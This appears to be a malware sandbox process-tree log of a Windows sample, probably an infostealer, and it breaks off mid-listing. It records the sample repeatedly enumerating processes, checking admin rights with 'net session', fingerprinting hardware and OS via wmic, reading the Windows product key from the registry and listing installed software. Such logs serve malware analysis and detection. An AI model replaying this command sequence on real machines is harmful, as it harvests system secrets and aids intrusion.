- Enumerates processes with tasklist
PID:7576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1120
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8212
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4576
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3120
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4248
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3684
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7340
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1624
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2668
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3908
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1008
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2796
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3492
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1580
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4560
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4056
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7816
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:452
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2024
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:540
-
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:2416
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8004
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:228
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4496
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:1524
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:7996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4352
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4784
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4520
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8244
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4340
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4628
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4164
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4816
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3020
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3100
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3968
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4588
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:3408
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:516
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:7972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4620
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:4048
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5128
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5156
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5180
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5188
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:8204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:5216
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
PID:8252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "net session"2⤵PID:5224
-
C:\Windows\system32\net.exenet session3⤵PID:8516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:9236
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"2⤵PID:5252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"2⤵PID:5288
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:7964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"2⤵PID:5304
-
C:\Windows\System32\Wbem\WMIC.exewmic OS get caption, osarchitecture3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7800
-
-
C:\Windows\system32\more.commore +13⤵PID:7988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"2⤵PID:9544
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵PID:10556
-
-
C:\Windows\system32\more.commore +13⤵PID:10564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"2⤵PID:10628
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController get name3⤵
- Detects videocard installed
PID:10388
-
-
C:\Windows\system32\more.commore +13⤵PID:11020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵PID:8308
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"2⤵PID:10464
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:9544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName3⤵
- Suspicious behavior: EnumeratesProcesses
PID:8388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵PID:11052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5304
-
-
C:\Windows\system32\tasklist.exetasklist3⤵PID:5792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2572 get ExecutablePath"2⤵PID:10376
-
C:\Windows\System32\Wbem\WMIC.exewmic process where processid=2572 get ExecutablePath3⤵PID:1108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:4796
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:10120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""2⤵PID:10864
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"3⤵PID:10896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""2⤵PID:10872
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"3⤵PID:8140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""2⤵PID:6620
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"3⤵PID:10888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""2⤵PID:9248
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"3⤵PID:4048
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""2⤵PID:6948
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"3⤵PID:6728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""2⤵PID:1100
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"3⤵PID:8240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""2⤵PID:8236
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"3⤵PID:7056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""2⤵PID:10056
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"3⤵PID:9064
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""2⤵PID:6160
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"3⤵PID:8528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""2⤵PID:2380
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"3⤵PID:5028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""2⤵PID:10340
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"3⤵PID:8808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""2⤵PID:7116
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"3⤵PID:8588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)""2⤵PID:4072
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 124.0.2 (x64 en-US)"3⤵PID:7052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""2⤵PID:8256
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"3⤵PID:10372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""2⤵PID:2116
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"3⤵PID:8284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""2⤵PID:6176
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"3⤵PID:7988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""2⤵PID:5792
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"3⤵PID:5304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""2⤵PID:4252
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"3⤵PID:9320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""2⤵PID:9644
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"3⤵PID:1136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""2⤵PID:2432
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"3⤵PID:8172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""2⤵PID:8488
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"3⤵PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""2⤵PID:9220
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"3⤵PID:8176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""2⤵PID:8548
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"3⤵PID:9568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""2⤵PID:9184
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"3⤵PID:7872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""2⤵PID:8352
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"3⤵PID:8492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""2⤵PID:9720
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"3⤵PID:8984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""2⤵PID:8324
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"3⤵PID:8468
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""2⤵PID:8540
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"3⤵PID:9364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""2⤵PID:8072
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"3⤵PID:9928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""2⤵PID:10192
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"3⤵PID:9780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""2⤵PID:8800
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"3⤵PID:9392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""2⤵PID:8096
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"3⤵PID:8688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""2⤵PID:8828
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"3⤵PID:10140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""2⤵PID:6744
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"3⤵PID:1172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""2⤵PID:4820
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"3⤵PID:6608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""2⤵PID:4040
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"3⤵PID:1772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""2⤵PID:8220
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"3⤵PID:5888
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""2⤵PID:4764
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"3⤵PID:6748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""2⤵PID:5596
-
